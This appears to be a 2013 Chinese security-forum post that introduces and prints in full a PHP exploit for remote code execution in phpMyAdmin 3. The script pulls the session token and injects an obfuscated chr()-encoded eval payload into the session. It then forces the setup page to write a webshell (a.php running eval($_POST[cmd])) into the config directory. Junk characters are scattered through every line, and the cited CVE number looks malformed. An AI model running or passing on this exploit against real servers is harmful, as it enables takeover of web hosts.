最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。. }6 U3 ]3 O; L0 W. q7 [
9 H! `2 q2 Z, x# o- ^. t昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
$ Y& O P* r( S9 V2 {' o& |7 }2 _! P, T+ v: x2 K& b/ G
首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:
7 @* R: k v, P y一是session.auto_start = 1;
1 \& |! o& k9 G% o3 B7 V二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
, @$ @' w2 }3 v当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。+ p; u2 e- w/ \" [+ e2 b, T. J, H/ Z
" o4 c8 H0 f+ [) f* W# A& }8 C! m
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
% `% J, t0 Z/ u. i& N g) A, Y+ F% G; u3 N0 g G7 {
于是写了这个php版本的exp,代码如下:
9 r: K) @! t3 n
3 z$ y4 ]6 f9 Q! N V4 r' h' f#!/usr/bin/php
w1 n3 L' U! J) R& K<?php
: w: c R. _4 R3 Oprint_r('
8 u9 j0 H9 ~* S* O% T0 y- R% S) { A+---------------------------------------------------------------------------+
c1 }1 K( P3 J# O0 n. Wpma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]
) T0 q# s, r& P; P) z% Kby oldjun(www.oldjun.com)$ C) l8 E$ B# I
welcome to www.t00ls.net
6 K4 r, p* `( N+ r% l) hmail: oldjun@gmail.com! V, z# L; I6 V7 y
Assigned CVE id: CVE-2011-25056 \- v2 L! e; y9 v
+---------------------------------------------------------------------------+
7 p4 `) z1 p2 B7 } V7 d+ K5 n# e');
: j" Q: q8 t) w: F' c( B
' J7 a: V, M/ E5 X/**$ G9 W% f, R! W- x% I0 n4 @$ q
* working when the directory:"config" exists and is writeable.
- _: R" n! j4 [**/6 C; u6 N: F/ x/ F- J# L! S3 C4 Q
5 C* f" ?% X2 b3 Qif ($argc < 3) {
+ ~3 J* ^" M! X' \; r print_r('
$ y% z6 O. f; f: K K; Y+---------------------------------------------------------------------------+
, `4 T$ G8 d. c7 K1 }Usage: php '.$argv[0].' host path5 T6 |# H" h% _: G# {) [9 C
host: target server (ip/hostname); {* q5 v; c7 i, N* g/ f) ?
path: path to pma3& ?$ S/ u( j* Z# P, _! e3 D
Example:
8 W$ z# v1 L* C9 a* t( u, d4 H- }php '.$argv[0].' localhost /pma// y1 E$ l6 ]/ j' G
+---------------------------------------------------------------------------+7 C9 O' {: Z' U' R; C5 I. w' i! U% \( R
');
5 P9 s- u+ R _ A2 U exit;
9 H; s1 y8 }$ @$ ]* o4 b}6 W+ K* ^6 }' [: c8 x4 w) }
E( W: e' u. O+ M9 ?) j4 n# P: P
$host = $argv[1];7 ]( }* R, X; ^$ W$ t/ T4 y2 l; J( ~
$path = $argv[2];
, E% [1 M; `3 h8 \
6 T2 [& b1 k6 _/ t/**
8 G: k3 }1 f4 b. @" D * Try to determine if the directory:"config" exists8 ]8 ]4 {" I& W, B! o; K9 K2 R) j
**/; G! J- q0 R% _5 c+ e
echo "[+] Try to determine if the directory:config exists....\n";* ?( d0 u$ R! b$ t7 r
$returnstr=php_request('config/');+ s* H4 `' N+ x* ?3 ~) ?6 Z8 k
if(strpos($returnstr,'404')){' J8 Q; T: t( |- O7 _2 @
exit("[-] Exploit Failed! The directory:config do not exists!\n");
5 b, h) {9 a9 } A, ~' H" V) A}
8 c9 ~& |. `. S* F+ ~
& c$ m# u) u+ Z/**9 I6 p+ C( r# _ t; O: R+ N
* Try to get token and sessionid4 K% x2 X* l; E" z6 D! k
**/
& j' F$ A* Z. N$ w) w8 {6 Gecho "[+] Try to get token and sessionid....\n";
/ @; Y8 z3 X& H$result=php_request('index.php');' \6 e8 I* t6 \. a7 s; W# ^( ?/ J4 T
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
* i$ m+ p0 G: p$token=$resp[3];* W. E e: ?7 T% z! S
$sessionid=$resp[1];8 N1 g# m+ \4 F* k
if($token && $sessionid){
+ x3 @- F0 j- V2 x$ Z echo "[+] token token\n";7 ^8 U- t/ ]2 f! m
echo "[+] Session IDsessionid\n";
* g7 A" `' S* i* ]4 Z: ?; H/ E' C}else{
* R3 ^+ }3 ^- X9 u5 ^ exit("[-] Can't get token and Session ID,Exploit Failed!\n");
( L( Z4 ` P3 B- R}+ a: R# u8 M3 a8 k. w( T
+ s0 ]+ t1 S# C
/**
3 }- [# I* X% s; w& O% i1 k) q1 t * Try to insert shell into session- p: I, O0 F* D" I3 s
**/
; R# K q7 [! b/ W# kecho "[+] Try to insert shell into session....\n";
# j* J: r" U0 o6 s: D9 O* l8 z* h9 B9 Y9 aphp_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
0 r5 l. J+ m2 K9 h1 e9 S
' M1 H: Q w5 ?2 H/ h/**
: N4 R+ a \2 j- A8 n8 n) R * Try to create webshell
) c0 H2 x9 C4 y) o**/* N2 z) p. [ N$ Z# P+ v4 {* c
echo "[+] Try to create webshell....\n";8 N: A2 K8 d/ Z4 M k/ I h
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
- H+ Y, l$ B @2 L6 \* G: X/**! @! k. V4 k2 }2 c) ]9 D+ I' P5 ~
* Try to check if the webshell was created successfully
* r9 o3 Y( @1 u* o* e**/
$ i( \) Z: e. E, K; S7 f* kecho "[+] Try to check if the webshell was created successfully....\n";
7 r# h6 V& {" J: A3 M$content=php_request('config/config.inc.php');7 {: ~& i9 d1 m- m
if(strpos($content,'t00ls')){( b, q& `% Z2 g- C
echo "[+] Congratulations! Expoilt successfully....\n";( j% V: S" w! Z0 h8 _
echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";! g' [, r& k. ]
}else{+ h- ~; c$ U0 W4 v; a" V, E' n9 X
exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");
) q* [$ {% U/ z) @& \! b- T) ~}- l8 c9 U$ M" N2 d: ^- \
, _+ g5 Y' ?- }; _- b, Cfunction php_request($url,$data='',$cookie=''){
4 h5 N6 B# [; \2 L5 c$ c global $host, $path;& a* d& j0 o8 C3 P3 z8 D1 |
- h5 ~; c& h, Q/ w
$method=$data?'POST':'GET';
" B1 T9 u* ~( C1 W 0 z$ i5 d2 P. B! x! Y: P% I
$packet = $method." ".$path.$url." HTTP/1.1\r\n";
! A' I9 ^' F2 a0 ^1 a- P4 I* e& h $packet .= "Accept: */*\r\n";
, J7 |8 L; K8 \+ z& W; B" ?/ Q* u $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
% p L; C2 y1 \4 {5 U $packet .= "Host: $host\r\n";
6 x: |3 K" h* \+ I- g; u+ Z4 ?& Q $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";0 o+ z7 }5 s2 j: w O. p
$packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";
" t" l7 l* p' i- l# n" q: T$ A $packet .= $cookie?"Cookie: $cookie\r\n":"";
, R& {; g. d3 B. R& W1 d& a$ z $packet .= "Connection: Close\r\n\r\n";
4 h$ X5 v5 _2 P( y, n $packet .= $data?$data:"";
; o; i, N$ ^% b
" d0 t6 {$ m* g% ^ $fp = fsockopen(gethostbyname($host), 80);/ |8 h* K( i* w9 \' X
if (!$fp) {
( c8 |2 W; z8 M echo 'No response from '.$host; die;
" d. `& t$ P7 g3 `, \1 k2 }+ L }
/ _7 u' K; o4 i( e fputs($fp, $packet);
5 h3 U6 N6 E7 s. i+ g K: ]1 p' H( D# m3 Z7 i1 _# }, ]/ q( r5 a
$resp = '';8 t4 _" A6 T0 U- Z) }9 a. z4 D/ m
$ B1 U9 q% g& t3 ^* m b% O% ? while ($fp && !feof($fp))
8 q( \1 c4 A% ?! u4 S $resp .= fread($fp, 1024);
. U! \0 P$ K" D; s# {6 v
6 h& ?, \+ c. f) a. y, r B return $resp;4 L+ |2 U' ?1 ^* x! c: R
}
. I, U3 T( e# q7 M: k+ }
3 s8 r5 n; T3 n- s?> 4 n8 H4 P7 [( w/ t2 g. @/ c
. |
发表于 2013-2-21 09:13:03
收藏
支持
反对